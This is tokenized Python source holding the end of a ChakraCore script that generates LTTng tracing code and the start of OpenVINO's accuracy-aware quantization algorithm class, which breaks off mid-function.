fixedBuffer);")<block_end><elif_stmt>functionParameter.winType<eq>"win:GUID"<block_start>methodBody.append("success &= WriteToBuffer(*"+paramName+", buffer, offset, size, fixedBuffer);")<block_end><else_stmt><block_start>methodBody.append("success &= WriteToBuffer("+paramName+", buffer, offset, size, fixedBuffer);")<block_end><block_end>methodBody.append("if (!success)")<line_sep>methodBody.append("{")<line_sep>methodBody.append(" if (!fixedBuffer) delete[] buffer;")<line_sep>methodBody.append(" return ERROR_WRITE_FAULT;")<line_sep>methodBody.append("}")<line_sep>methodBody.append("do_tracepoint("+providerName+", "+eventName+", offset, buffer);")<line_sep>methodBody.append("if (!fixedBuffer) delete[] buffer;")<block_end><return>"\n ".join(methodBody)+"\n"<block_end><def_stmt>generateMethodSignature template<block_start><if_stmt><not>template<block_start><return>""<block_end>functionSignature=template.signature<line_sep>lineFunctionPrototype=[]<for_stmt>paramName functionSignature.paramList<block_start>functionParameter=functionSignature.getParam(paramName)<line_sep>wintypeName=functionParameter.winType<line_sep>mappedType=palDataTypeMapping[wintypeName]<line_sep>winCount=functionParameter.count<line_sep>mappedCount=palDataTypeMapping[winCount]<if_stmt>paramName<in>template.structCounts<block_start>lineFunctionPrototype.append(" int "+paramName+"_ElementSize")<block_end># lineFunctionPrototype.append("// " + wintypeName + " " + str(functionParameter.length)) lineFunctionPrototype.append(" "+mappedType+(mappedCount<if>mappedCount<ne>" "<else>"*"<if>functionParameter.length<and><not>wintypeName<in>["win:UnicodeString" "win:AnsiString"]<else>"")+" "+functionParameter.name)<block_end><return>",\n".join(lineFunctionPrototype)<block_end><def_stmt>generateLttngTracepointProvider providerName lttngHeader templates events<block_start>providerLines=[]<line_sep>providerLines.append("#define TRACEPOINT_DEFINE")<line_sep>providerLines.append("#ifndef CHAKRA_STATIC_LIBRARY")<line_sep>providerLines.append("#define TRACEPOINT_PROBE_DYNAMIC_LINKAGE")<line_sep>providerLines.append("#endif")<line_sep>providerLines.append("#include \"stdlib.h\"")<line_sep>providerLines.append("#include \"Common.h\"")<line_sep>providerLines.append("#include \"Codex/Utf8Helper.h\"")<line_sep>providerLines.append("#include \""+lttngHeader+"\"\n\n")<line_sep>providerLines.append("#ifndef tracepoint_enabled")<line_sep>providerLines.append("#define tracepoint_enabled(provider, name) 1")<line_sep>providerLines.append("#define do_tracepoint tracepoint")<line_sep>providerLines.append("#endif")<line_sep>providerLines.append(""" bool ResizeBuffer(char *&buffer, int&size, int currentLength, int newSize, bool &fixedBuffer) { newSize *= 1.5; _ASSERTE(newSize > size); // Check for overflow if (newSize < 32) { newSize = 32; } char *newBuffer = new char[newSize]; memcpy(newBuffer, buffer, currentLength); if (!fixedBuffer) { delete[] buffer; } buffer = newBuffer; size = newSize; fixedBuffer = false; return true; } bool WriteToBuffer(const char * src, int len, char *&buffer, int &offset, int &size, bool &fixedBuffer) { if (!src) { return true; } if (offset + len > size) { if (!ResizeBuffer(buffer, size, offset, size+len, fixedBuffer)) { return false; } } memcpy(buffer + offset, src, len); offset += len; return true; } template <typename T> bool WriteToBuffer(const T &value, char *&buffer, int&offset, int&size, bool &fixedBuffer) { if (sizeof(T) + offset > size) { if (!ResizeBuffer(buffer, size, offset, size + sizeof(T), fixedBuffer)) { return false; } } *(T *)(buffer + offset) = value; offset += sizeof(T); return true; } """)<for_stmt>eventNode events<block_start>eventName=eventNode.getAttribute('symbol')<line_sep>templateName=eventNode.getAttribute('template')<line_sep>providerLines.append("extern \"C\" bool EventXplatEnabled%s(){ return tracepoint_enabled(%s, %s);}"%(eventName providerName eventName))<line_sep>providerLines.append("")<line_sep>template=<none><if_stmt>templateName<block_start>template=templates[templateName]<block_end>providerLines.append("extern \"C\" unsigned long FireEtXplat"+eventName+"(")<line_sep>providerLines.append(generateMethodSignature(template))<line_sep>providerLines.append(")")<line_sep>providerLines.append("{")<line_sep>providerLines.append(" if (!EventXplatEnabled"+eventName+"())")<line_sep>providerLines.append(" return ERROR_SUCCESS;")<if_stmt>template<block_start>providerLines.append(generateMethodBody(template providerName eventName))<block_end><else_stmt><block_start>providerLines.append(" do_tracepoint("+providerName+", "+eventName+");")<block_end>providerLines.append("")<line_sep>providerLines.append(" return ERROR_SUCCESS;")<line_sep>providerLines.append("}")<line_sep>providerLines.append("")<block_end><return>"\n".join(providerLines)<block_end><def_stmt>generateEtwHeader templates events<block_start>headerLines=[]<line_sep>headerLines.append("#include \"pal.h\"")<line_sep>headerLines.append("")<for_stmt>event events<block_start>eventName=event.getAttribute('symbol')<line_sep>templateName=event.getAttribute('template')<line_sep>template=<none><if_stmt>templateName<block_start>template=templates[templateName]<block_end>callArgs=[]<if_stmt>template<block_start>functionSignature=template.signature<for_stmt>param functionSignature.paramList<block_start><if_stmt>param<in>template.structCounts<block_start>callArgs.append(param+"_ElementSize")<block_end>callArgs.append(param)<block_end><block_end>headerLines.append("extern \"C\" bool EventXplatEnabled"+eventName+"();")<line_sep>headerLines.append("inline bool EventEnabled"+eventName+"() { return EventXplatEnabled"+eventName+"();}")<line_sep>headerLines.append("")<line_sep>headerLines.append("extern \"C\" unsigned long FireEtXplat"+eventName+" (")<line_sep>headerLines.append(generateMethodSignature(template))<line_sep>headerLines.append(");")<line_sep>headerLines.append("inline unsigned long EventWrite"+eventName+"(")<line_sep>headerLines.append(generateMethodSignature(template))<line_sep>headerLines.append(")")<line_sep>headerLines.append("{")<line_sep>headerLines.append(" return FireEtXplat"+eventName+"("+", ".join(callArgs)+");")<line_sep>headerLines.append("}")<line_sep>headerLines.append("")<block_end><return>"\n".join(headerLines)<block_end><def_stmt>generateCmakeFile providerName<block_start>cmakeLines=[]<line_sep>cmakeLines.append("project(Chakra.LTTng)")<line_sep>cmakeLines.append("")<line_sep>cmakeLines.append("add_compile_options(-fPIC)")<line_sep>cmakeLines.append("")<line_sep>cmakeLines.append("add_library (Chakra.LTTng OBJECT")<line_sep>cmakeLines.append(" eventprovider"+providerName+".cpp")<line_sep>cmakeLines.append(" tracepointprovider"+providerName+".cpp")<line_sep>cmakeLines.append(")")<line_sep><return>"\n".join(cmakeLines)<block_end><def_stmt>generateLttngFiles manifest providerDirectory<block_start><import_stmt>os<line_sep>tree=DOM.parse(manifest)<if_stmt><not>os.path.exists(providerDirectory)<block_start>os.makedirs(providerDirectory)<block_end><if_stmt><not>os.path.exists(providerDirectory+"/lttng")<block_start>os.makedirs(providerDirectory+"/lttng")<block_end><for_stmt>providerNode tree.getElementsByTagName("provider")<block_start>providerName=providerNode.getAttribute("name")<line_sep>providerName=providerName.replace("Microsoft-" "")<line_sep>providerNameFile=providerName.lower()<line_sep>lttngEventHeaderShortName="tp"+providerNameFile+".h"<line_sep>lttngEventHeaderPath=providerDirectory+"/lttng/"+lttngEventHeaderShortName<line_sep>lttngEventProvider=providerDirectory+"/lttng/eventprovider"+providerNameFile+".cpp"<line_sep>lttngEventProviderTrace=providerDirectory+"/lttng/tracepointprovider"+providerNameFile+".cpp"<line_sep>lttngEtwHeaderFile=providerDirectory+"/lttng/"+providerNameFile+"Etw.h"<line_sep>lttngCmakeFile=providerDirectory+"/lttng/CMakeLists.txt"<line_sep>lttngHeader=open(lttngEventHeaderPath "w")<line_sep>lttngImplementation=open(lttngEventProvider "w")<line_sep>lttngTraceImplementation=open(lttngEventProviderTrace "w")<line_sep>lttngEtwHeader=open(lttngEtwHeaderFile "w")<line_sep>lttngCmake=open(lttngCmakeFile "w")<line_sep># Create the lttng implementation lttngTraceImplementation.write("#define TRACEPOINT_CREATE_PROBES\n")<line_sep>lttngTraceImplementation.write("#include \"./"+lttngEventHeaderShortName+"\"\n")<line_sep>lttngTraceImplementation.close()<line_sep># Create the lttng header templateNodes=providerNode.getElementsByTagName('template')<line_sep>eventNodes=providerNode.getElementsByTagName('event')<line_sep>allTemplates=parseTemplateNodes(templateNodes)<line_sep>lttngHeader.write(generateLttngHeader(providerName lttngEventHeaderShortName allTemplates eventNodes))<line_sep>lttngHeader.close()<line_sep>lttngImplementation.write(generateLttngTracepointProvider(providerName lttngEventHeaderShortName allTemplates eventNodes))<line_sep>lttngImplementation.close()<line_sep>lttngEtwHeader.write(generateEtwHeader(allTemplates eventNodes))<line_sep>lttngEtwHeader.close()<line_sep># Note: This in particular assumes that there is only one ETW provider lttngCmake.write(generateCmakeFile(providerNameFile))<line_sep>lttngCmake.close()<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><import_stmt>argparse<import_stmt>sys<line_sep>parser=argparse.ArgumentParser(description="Generates the Code required to instrument LTTtng logging mechanism")<line_sep>required=parser.add_argument_group('required arguments')<line_sep>required.add_argument('--man' type=str required=<true> help='full path to manifest containig the description of events')<line_sep>required.add_argument('--intermediate' type=str required=<true> help='full path to eventprovider intermediate directory')<line_sep>args,unknown=parser.parse_known_args(sys.argv[1:])<if_stmt>unknown<block_start>print('Unknown argument(s): ' ', '.join(unknown))<line_sep>sys.exit(1)<block_end>generateLttngFiles(args.man args.intermediate)<line_sep>sys.exit(0)<block_end>
# Copyright (C) 2020-2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 <import_stmt>os<import_stmt>random<import_from_stmt>copy deepcopy<import_from_stmt>sys maxsize<import_stmt>numpy<as>np<import_from_stmt>.utils create_metric_config is_preset_performance get_mixed_preset_config evaluate_model get_num_of_quantized_ops<import_from_stmt>..utils load_hardware_config<import_from_stmt>...algorithm Algorithm<import_from_stmt>...algorithm_selector COMPRESSION_ALGORITHMS<import_from_stmt>....algorithms.quantization utils<as>eu<import_from_stmt>....graph node_utils<as>nu<import_from_stmt>....graph.model_utils save_model get_nodes_by_type<import_from_stmt>....graph.transformer GraphTransformer<import_from_stmt>....samplers.creator create_sampler<import_from_stmt>....statistics.statistics TensorStatistic<import_from_stmt>....utils.logger get_logger<import_from_stmt>....utils.telemetry send_event<line_sep>logger=get_logger(__name__)<line_sep># pylint: disable=R0912 @COMPRESSION_ALGORITHMS.register('AccuracyAwareCommon')<class_stmt>AccuracyAwareCommon(Algorithm)<block_start>name='AccuracyAwareCommon'<def_stmt>__init__ self config engine<block_start>super().__init__(config engine)<line_sep># configure default parameters default_config={'metric_subset_ratio':0.5 'ranking_subset_size':config.get('ranking_subset_size' min(len(engine.data_loader) 300)) 'max_iter_num':maxsize 'maximal_drop':0.01 'drop_type':'absolute' 'use_prev_if_drop_increase':<true> 'base_algorithm':'DefaultQuantization' 'annotation_free':<false> 'tune_hyperparams':<false> 'annotation_conf_threshold':0.6 'convert_to_mixed_preset':<false>}<for_stmt>setting default_config<block_start><if_stmt>setting<not><in>self._config<block_start>self._config[setting]=default_config[setting]<block_end><block_end>self._config.convert_to_mixed_preset=self._config.convert_to_mixed_preset<and>is_preset_performance(self._config)<line_sep>save_dir=self._config.get('exec_log_dir' os.path.curdir)<line_sep>self._config.intermediate_log_dir=os.path.join(save_dir 'accuracy_aware_intermediate')<line_sep>self._engine.calculate_metrics=<true><line_sep># Create initial quantization algorithms self._quantization_algo=self._create_quantization_algo(self._config 'AAQuantizationAlgorithm' self._engine)<line_sep>self._preset_conversion_algo=self._create_quantization_algo(get_mixed_preset_config(self._config) 'AAConversionAlgorithm' self._engine)<line_sep>self._grid_search_algo=COMPRESSION_ALGORITHMS.get('ParamsGridSearchAlgorithm')(self._config engine)<line_sep>self._grid_search_algo.default_algo=self._quantization_algo<line_sep># Configure metrics self._metrics_config=create_metric_config(self._engine self._config)<line_sep>self._baseline_metric={metric.name:metric.baseline_value<for>metric self._config.metrics<if>metric.name<in>self._metrics_config}<if>self._config.metrics<and>all('baseline_value'<in>metric.keys()<for>metric self._config.metrics)<else>{}<line_sep>self._max_drop_by_name={}<line_sep>self._original_per_sample_metrics=<none><line_sep>self._output_node_name,self._stats_layout=<none> <none><line_sep>self._quantized_layers_num=0<line_sep>self._dataset_size=len(self._engine.data_loader)<line_sep>metric_subset_size=int(self._dataset_size<times>self._config.metric_subset_ratio)<line_sep>self._diff_subset_indices=sorted(random.sample(range(self._dataset_size) metric_subset_size))<if>metric_subset_size<l>self._dataset_size<and>self._baseline_metric<else>list(range(self._dataset_size))<line_sep>self._graph_transformer=GraphTransformer(load_hardware_config(self._config))<line_sep>self.default_steps_size=0.005<line_sep>self.total_exec_steps=self._config.get('stat_subset_size' self._dataset_size)<line_sep>self._quantization_algo.default_steps_size=self.default_steps_size<if_stmt>self._config.convert_to_mixed_preset<block_start>self._preset_conversion_algo.default_steps_size=self.default_steps_size<block_end>self._stats_collector=<none><line_sep>self._precision_change_to='floating-point'<line_sep>self._need_to_change_scope=<true><line_sep>self._change_conditions=<none><line_sep>self._exclude_bad_nodes=<false><block_end>@property<def_stmt>change_original_model self<block_start><return><true><block_end><def_stmt>register_statistics self model stats_collector<block_start>self._stats_collector=stats_collector<line_sep>self._quantization_algo.register_statistics(model stats_collector)<if_stmt>self._config.convert_to_mixed_preset<block_start>self._preset_conversion_algo.register_statistics(model stats_collector)<block_end><if_stmt>self._config.tune_hyperparams<block_start>self._grid_search_algo.register_statistics(model stats_collector)<block_end><block_end><def_stmt>run self model<block_start>""" this function applies the accuracy aware quantization scope search algorithm :param model: model to apply algo :return model with modified quantization scope to match required accuracy values """<if_stmt><not>self._metrics_config<block_start>logger.info('Could not find the required metrics for optimization in the engine. '<concat>'Stop AccuracyAware optimization. '<concat>'Available metrics: %s.' ', '.join(self._engine.get_metrics_attributes()))<line_sep>logger.update_progress(self.total_exec_steps)<line_sep><return>model<block_end># configure stats layout to collect raw output # to calculate persample difference for special metrics self._output_node_name=nu.get_node_input(model.get_final_output_nodes()[0] 0).name<line_sep># gets first output node <for_stmt>metric_config self._metrics_config.values()<block_start><if_stmt>metric_config.persample.is_special<block_start>self._stats_layout={self._output_node_name:{'output_logits':TensorStatistic(<lambda>a:a)}}<line_sep><break><block_end><block_end>self._request_alt_statistics(model)<line_sep>print_progress=logger.progress_bar_disabled<if_stmt><not>self._baseline_metric<or>self._config.annotation_free# collect predictions of original model <block_start><if_stmt>self._config.annotation_free<block_start>self._engine.dump_prediction_to_annotation=<true><line_sep>self._engine.annotation_conf_threshold=self._config.annotation_conf_threshold<block_end>self._baseline_metric,self._original_per_sample_metrics=self._collect_baseline(model print_progress)<block_end>logger.info('Baseline metrics: %s' self._baseline_metric)<line_sep># update dataset info <if_stmt>self._config.annotation_free<block_start>self._dataset_size=len(self._engine.data_loader)<line_sep>self._diff_subset_indices=list(range(self._dataset_size))<block_end># configure values of metrics maximum drop max_drop=self._config.maximal_drop<if_stmt>self._config.drop_type<eq>'relative'<block_start>self._max_drop_by_name={name:value<times>max_drop<for>name,value self._baseline_metric.items()}<block_end><else_stmt><block_start>self._max_drop_by_name={name:max_drop<for>name,value self._baseline_metric.items()}<block_end># quantize model quantized_model,metrics_accuracy_drop,quantized_metrics_per_sample=self._quantize_and_evaluate(deepcopy(model) self._quantize_model print_progress=print_progress)<line_sep>self._save_intermediate_model(quantized_model)<if_stmt>self._drop_restrictions_are_met(metrics_accuracy_drop)<block_start>send_event("result_aa" self._get_result_aa(metrics_accuracy_drop 0))<line_sep><return>quantized_model<block_end>default_quantization_config=self._quantization_algo.config<line_sep># change quantization preset of the model if possible <if_stmt>self._config.convert_to_mixed_preset<block_start>quantized_model,metrics_accuracy_drop,quantized_metrics_per_sample=self._quantize_and_evaluate(deepcopy(model) self._convert_model_to_mixed_preset print_progress=print_progress)<line_sep>self._save_intermediate_model(quantized_model)<if_stmt>self._drop_restrictions_are_met(metrics_accuracy_drop)<block_start>send_event("result_aa" self._get_result_aa(metrics_accuracy_drop 0))<line_sep><return>quantized_model<block_end>default_quantization_config=self._preset_conversion_algo.config<block_end><if_stmt><not>self._original_per_sample_metrics<block_start>_,self._original_per_sample_metrics=self._evaluate_model(model=model subset_indices=self._diff_subset_indices)<block_end># change quantization parameters of the model <if_stmt>self._config.tune_hyperparams<block_start>worst_ranking_subset=self._create_hardest_ranking_subset(quantized_metrics_per_sample)<line_sep>self._grid_search_algo.update_config(default_quantization_config)<line_sep>self._grid_search_algo.set_subset_and_metric(worst_ranking_subset self._metrics_config)<line_sep>self._engine.allow_pairwise_subset=<true><line_sep>updated_quantized_model,updated_metrics_accuracy_drop,updated_quantized_metrics_per_sample=self._quantize_and_evaluate(deepcopy(model) self._search_optimal_parameters print_progress=print_progress)<line_sep>default_mean_drop=np.mean([value<for>name,value metrics_accuracy_drop.items()])<line_sep>updated_mean_drop=np.mean([value<for>name,value updated_metrics_accuracy_drop.items()])<if_stmt>updated_mean_drop<l>default_mean_drop<block_start>logger.info('Applying the best configuration')<line_sep>quantized_model=updated_quantized_model<line_sep>metrics_accuracy_drop=updated_metrics_accuracy_drop<line_sep>quantized_metrics_per_sample=updated_quantized_metrics_per_sample<block_end>self._engine.allow_pairwise_subset=<false><line_sep>self._save_intermediate_model(quantized_model)<if_stmt>self._drop_restrictions_are_met(metrics_accuracy_drop)<block_start>send_event("result_aa" self._get_result_aa(metrics_accuracy_drop 0))<line_sep><return>quantized_model<block_end><block_end># we need to do this for more efficient memory consumption which is too high # because _change_quantization_scope(..) will allocate one more model <del_stmt>model<if_stmt>self._need_to_change_scope<block_start><return>self._change_quantization_scope(quantized_model metrics_accuracy_drop quantized_metrics_per_sample)<block_end>logger.info('Quantization scope was not changed due to algo conditions: %s' self._change_conditions)<line_sep>logger.update_progress(self.total_exec_steps)<line_sep><return>quantized_model<block_end><def_stmt>_collect_baseline self model print_progress<block_start>logger.info('Start original model inference')<line_sep><return>self._evaluate_model(model=model print_progress=print_progress)<block_end><def_stmt>_change_quantization_scope self model original_accuracy_drop fully_quantized_metrics_per_sample<block_start>"""Applies greedy search to remove fake-quantize nodes that degrade metric values :param model: fully quantized model :param original_accuracy_drop: dictionary of per-metric drops of fully quantized model {metric_name: drop_value} :param fully_quantized_metrics_per_sample: dictionary of per-sample metrics values of fully quantized model :return model: model with new quantization scope """<line_sep>self._quantized_layers_num=self._get_num_of_quantized_ops(model)<line_sep>logger.info('The total number of quantized operations in the graph: %d' self._quantized_layers_num)<line_sep>logger.info('Changing fake quantize nodes scope')<line_sep>all_changed_nodes_names=[]<line_sep>all_ops_in_targeted_prec=set()<line_sep>drop_functor=<lambda>a:(original_accuracy_drop[a]-self._max_drop_by_name[a])/self._baseline_metric[a]<line_sep>metric_to_optimize=sorted(original_accuracy_drop.keys() key=drop_functor)[-1]<line_sep>logger.info('Optimizing %s metric' metric_to_optimize)<line_sep>accuracy_drop=original_accuracy_drop[metric_to_optimize]<line_sep># calculate importance of fq nodes node_importance=self._get_node_importance(model metric_to_optimize fully_quantized_metrics_per_sample)<line_sep>quantized_metrics_per_sample=<none><line_sep>reached_required_drop=<false><line_sep>changed_all_fq=<false><line_sep>is_step_back=<true><line_sep>iteration=0<line_sep>excluded_nodes=[]<for_stmt>iteration range(self._config.max_iter_num)# save model and metrics from previous iteration <block_start>model_prev_iter=deepcopy(model)<line_sep>metrics_prev_iter=deepcopy(quantized_metrics_per_sample)<if_stmt><not>node_importance<block_start>logger.info('All layers have been checked and the AccuracyAwareQuantization '<concat>'will not be able to achieve the required accuracy drop')<line_sep>changed_all_fq=<true><line_sep><break><block_end># greedy removal of the FQ node with the highest importance score fq_name_to_change=node_importance.pop(0)<line_sep>model,changed_nodes,ops_in_targeted_prec=self._modify_model_in_scope(model [fq_name_to_change])<line_sep>logger.debug('Changed a block of %d FQ layers: %s' len(changed_nodes) changed_nodes)<line_sep>logger.info('Reverted %d layers to the %s precision: %s' len(ops_in_targeted_prec) self._precision_change_to ', '.join(ops_in_targeted_prec))<line_sep>all_changed_nodes_names.append(str(changed_nodes))<line_sep>all_ops_in_targeted_prec.update(ops_in_targeted_prec)<line_sep># save intermediate model self._save_intermediate_model(model)<line_sep># calculate drop for new quantization scope final_metrics,quantized_metrics_per_sample=self._evaluate_model(model=model per_sample_subset_indices=self._diff_subset_indices print_progress=<true>)<line_sep>metrics_accuracy_drop={name:params.comparator(self._baseline_metric[name]-final_metrics[name])<for>name,params self._metrics_config.items()}<line_sep>new_accuracy_drop=metrics_accuracy_drop[metric_to_optimize]<line_sep>logger.info('Accuracy drop with the new quantization scope is %s' metrics_accuracy_drop)<line_sep># removed all fake-quantize layers from the model <if_stmt><not>get_nodes_by_type(model ['FakeQuantize'])<block_start>logger.info('Removed all FQ layers from the network!')<line_sep>changed_all_fq=<true><line_sep><break><block_end># all drop restrictions are met <if_stmt>self._drop_restrictions_are_met(metrics_accuracy_drop)<block_start>reached_required_drop=<true><line_sep><break><block_end># continue greedy fq removal <if_stmt>self._max_drop_by_name[metric_to_optimize]<l>new_accuracy_drop<le>accuracy_drop<or>(new_accuracy_drop<g>accuracy_drop<and>is_step_back)<block_start>is_step_back=<false><line_sep>accuracy_drop=new_accuracy_drop<line_sep><continue><block_end># if after fq removal drop has increased # calculate node importance of the model (from previous iteration) <if_stmt>new_accuracy_drop<g>accuracy_drop<and>self._config.use_prev_if_drop_increase<block_start>model=model_prev_iter<line_sep>quantized_metrics_per_sample=metrics_prev_iter<line_sep>all_changed_nodes_names.remove(str(changed_nodes))<line_sep>all_ops_in_targeted_prec.difference_update(ops_in_targeted_prec)<if_stmt>self._exclude_bad_nodes<block_start>excluded_nodes.extend(changed_nodes)<block_end>logger.debug('%s added to excluded list: %s' str(changed_nodes) str(excluded_nodes))<line_sep>is_step_back=<true><block_end>accuracy_drop=new_accuracy_drop<line_sep># if drop restriction for the current metric is satisfied, select the next metric # and calculate node importance <if_stmt>new_accuracy_drop<le>self._max_drop_by_name[metric_to_optimize]<block_start>metric_to_optimize=sorted(original_accuracy_drop.keys() key=<lambda>a current_drop=metrics_accuracy_drop:(current_drop[a]-self._max_drop_by_name[a])/self._baseline_metric[a])[-1]<line_sep>logger.info('Optimizing %s metric' metric_to_optimize)<line_sep>accuracy_drop=original_accuracy_drop[metric_to_optimize]<line_sep>is_step_back=<false><block_end><del_stmt>model_prev_iter metrics_prev_iter<line_sep>logger.info('Re-calculating node importance')<line_sep>node_importance=self._get_node_importance(model metric_to_optimize quantized_metrics_per_sample excluded_nodes)<block_end><if_stmt>changed_all_fq<or><not>reached_required_drop# Do not remove or change! <block_start>logger.info('AccuracyAwareQuantization could not achieve the required accuracy drop.' force=<true>)<block_end><if_stmt>iteration+1<ge>self._config.max_iter_num<block_start>logger.info('Reached maximum number of iterations.')<block_end><if_stmt><not>changed_all_fq<block_start>logger.debug('Changed FakeQuantize nodes:\n %s' '\n'.join(all_changed_nodes_names))<line_sep>logger.info(' %d out of %d layers have been reverted back to the %s precision: %s' len(all_ops_in_targeted_prec) self._quantized_layers_num self._precision_change_to ', '.join(all_ops_in_targeted_prec))<line_sep>send_event("result_aa" self._get_result_aa(metrics_accuracy_drop len(all_ops_in_targeted_prec)))<block_end>logger.update_progress(self.total_exec_steps)<line_sep><return>model<block_end><def_stmt>_get_node_importance self model metric_name qmodel_per_sample_metrics=<none> excluded_nodes=<none><block_start>"""Creates a list of fake-quantize nodes importance in descending order based on their contribution to metric degradation :param model: model with fake-quantize nodes :param metric_name: metric to be taken into consideration :param qmodel_per_sample_metrics: per-sample metrics values of quantized model :return list of node names """<if_stmt>qmodel_per_sample_metrics<is><none># get quantized model predictions <block_start>_,qmodel_per_sample_metrics=self._evaluate_model(model=model subset_indices=self._diff_subset_indices)<block_end>ranking_subset=self._get_ranking_subset(qmodel_per_sample_metrics metric_name)# not sorted node_importance_score=self._calculate_node_importance_scores(model ranking_subset metric_name excluded_nodes)<line_sep># sort by error value and then by node name node_importance=sorted(node_importance_score.items() key=<lambda>x:(x[1] x[0]) reverse=<true>)<line_sep>node_importance=[n[0]<for>n node_importance]<line_sep><return>node_importance<block_end><def_stmt>_get_ranking_subset self qmodel_per_sample_metrics metric_name from_id=0<block_start>"""Determines samples on which the quantized model predicts worse than on the original model :param qmodel_per_sample_metrics: per-sample metrics values of the quantized model :param metric_name: metric to take into account :return a list of image ids """<line_sep>persample_metric=self._metrics_config[metric_name].persample<line_sep>sorted_sample_importance=persample_metric.sort_fn(self._original_per_sample_metrics[persample_metric.name] qmodel_per_sample_metrics[persample_metric.name] reverse=<true>)<line_sep>to_id=from_id+self._config.ranking_subset_size<line_sep>ranking_subset=np.array(self._diff_subset_indices)[sorted_sample_importance[from_id:to_id]]<line_sep><return>ranking_subset<block_end><def_stmt>_calculate_node_importance_scores self model ranking_subset metric_name excluded_nodes=<none><block_start>"""Cuts out FQ layers one after another and measures metric value on ranking subset. The higher the value, the more important the node. :param model: graph from which to cut nodes :param ranking_subset: subset on which the scores will be calculated :param metric_name: metric to take into account :return a dictionary of node importance {metric_name: score} """<line_sep>change_fqs=[]<line_sep>node_importance_score={}<line_sep>eu.select_evaluation_dataset(self._engine)<line_sep>fake_quantize_nodes=get_nodes_by_type(model ['FakeQuantize'])<for_stmt>node fake_quantize_nodes<block_start><if_stmt>excluded_nodes<and>node.name<in>excluded_nodes<block_start><continue><block_end><if_stmt>node.name<not><in>change_fqs<block_start>modified_model,modified_fq_layers,_=self._modify_model_in_scope(deepcopy(model) [node.name])<if_stmt><not>modified_fq_layers<block_start><continue><block_end>logger.debug('Changed\\Removed a block of %d FQ layers: %s' len(modified_fq_layers) modified_fq_layers)<line_sep>change_fqs<augadd>modified_fq_layers<line_sep>self._engine.set_model(modified_model)<line_sep>self._engine.allow_pairwise_subset=<true><line_sep>index_sampler=create_sampler(self._engine samples=list(ranking_subset))<line_sep>metrics,*_=self._engine.predict(sampler=index_sampler)<line_sep>self._engine.allow_pairwise_subset=<false><line_sep>logger.update_progress(self._config.ranking_subset_size)<line_sep>ranking_metric=self._metrics_config[metric_name].ranking<line_sep>node_importance_score[node.name]=ranking_metric.comparator(metrics[ranking_metric.name])<block_end><block_end>eu.reset_dataset_to_default(self._engine)<line_sep><return>node_importance_score<block_end><def_stmt>_modify_model_in_scope self model nodes_names<block_start><return>self._graph_transformer.remove_fq_nodes(deepcopy(model) nodes_names)<block_end><def_stmt>compute_total_exec_steps self model=<none><block_start>total_steps=0<line_sep># add dataset_size to total if baseline not implemented <if_stmt><not>self._baseline_metric<or>self._config.annotation_free<block_start>total_steps<augadd>self._dataset_size<block_end># add dataset_size to total for int8 inference total_steps<augadd>self._dataset_size<line_sep># add dataset_size to total in case of conversion to mixed mode <if_stmt>self._config.convert_to_mixed_preset<block_start>total_steps<augadd>self._dataset_size<block_end>nodes_length=len(get_nodes_by_type(model ['Convolution' 'MatMul']))<line_sep>num_steps=self._config['max_iter_num']<if>self._config['max_iter_num']<l>maxsize<else>nodes_length<line_sep>metric_computing_steps=nodes_length<times>self._config['ranking_subset_size']<line_sep># add ranking_subset_size for num_steps and again computing every 3 steps total_steps<augadd>metric_computing_steps+metric_computing_steps<times>self._config['ranking_subset_size']<times>num_steps/3<line_sep># add total run steps (num steps) without one of FQs pairs total_steps<augadd>num_steps<times>self._dataset_size<line_sep># number of statistics computing total_steps<augadd>self._quantization_algo.total_exec_steps<if_stmt>self._config.convert_to_mixed_preset<block_start>total_steps<augadd>self._preset_conversion_algo.total_exec_steps<block_end>self.total_exec_steps=total_steps<block_end><def_stmt>_convert_model_to_mixed_preset self model<block_start>logger.info('Start quantization in mixed mode')<line_sep><return>self._preset_conversion_algo.run(model)<block_end><def_stmt>_quantize_model self model<block_start>logger.info('Start quantization')<line_sep><return>self._quantization_algo.run(model)<block_end><def_stmt>_search_optimal_parameters self model<block_start>logger.info('Start parameters grid search')<line_sep><return>self._grid_search_algo.run(model)<block_end><def_stmt>_quantize_and_evaluate self model quantization_algo print_progress=<true><block_start><def_stmt>calculate_accuracy_drop <block_start><return>{metric_name:params.comparator(self._baseline_metric[metric_name]-quantized_metrics[metric_name])<for>metric_name,params self._metrics_config.items()}<block_end>quantized_model=quantization_algo(model)<line_sep>logger.info('Start compressed model inference')<line_sep>quantized_metrics,quantized_metrics_per_sample=self._evaluate_model(model=quantized_model per_sample_subset_indices=self._diff_subset_indices print_progress=print_progress)<line_sep>logger.info('Fully quantized metrics: %s' quantized_metrics)<line_sep>metrics_accuracy_drop=calculate_accuracy_drop()<line_sep>logger.info('Accuracy drop: %s' metrics_accuracy_drop)<line_sep><return>quantized_model metrics_accuracy_drop quantized_metrics_per_sample<block_end><def_stmt>_drop_restrictions_are_met self metrics_accuracy_drop<block_start><return>all(metrics_accuracy_drop[name]<le>self._max_drop_by_name[name]<for>name self._metrics_config)<block_end><def_stmt>_save_intermediate_model self model<block_start>save_model(model self._config.intermediate_log_dir model_name='intermediate_model')<line_sep>logger.debug('Intermediate model is saved in %s' self._config.intermediate_log_dir)<block_end><def_stmt>_create_hardest_ranking_subset self metrics_per_sample<block_start>worst_ranking_subset=[]<while_stmt>len(worst_ranking_subset)<l>self._config.ranking_subset_size<block_start>needed_subset_size=self._config.ranking_subset_size-len(worst_ranking_subset)<line_sep>top_n_samples=int(np.ceil(needed_subset_size/len(metrics_per_sample.keys())))<line_sep>local_ranking_subset=[]<for_stmt>metric_name metrics_per_sample<block_start>ranking_subset=self._get_ranking_subset(metrics_per_sample metric_name len(worst_ranking_subset))<line_sep>local_ranking_subset.extend(ranking_subset[:top_n_samples])<block_end>worst_ranking_subset.extend(list(set(local_ranking_subset)))<block_end><return>list(set(worst_ranking_subset))<block_end><def_stmt>_evaluate_model self model per_sample_subset_indices=<none> subset_indices=<none> print_progress=<true><block_start>metrics,metrics_per_sample=evaluate_model(model self._engine self._dataset_size subset_indices print_progress self._metrics_config per_sample_subset_indices self._output_node_name self._stats_layout)<line_sep>predict_step_size=self._dataset_size<if><not>subset_indices<else>len(subset_indices)<line_sep>logger.update_progress(predict_step_size)<line_sep><return>metrics metrics_per_sample<block_end><def_stmt>_request_alt_statistics self model<block_start><pass><block_end><def_stmt>_get_num_of_quantized_ops self model<block_start><return>get_num_of_quantized_ops(model 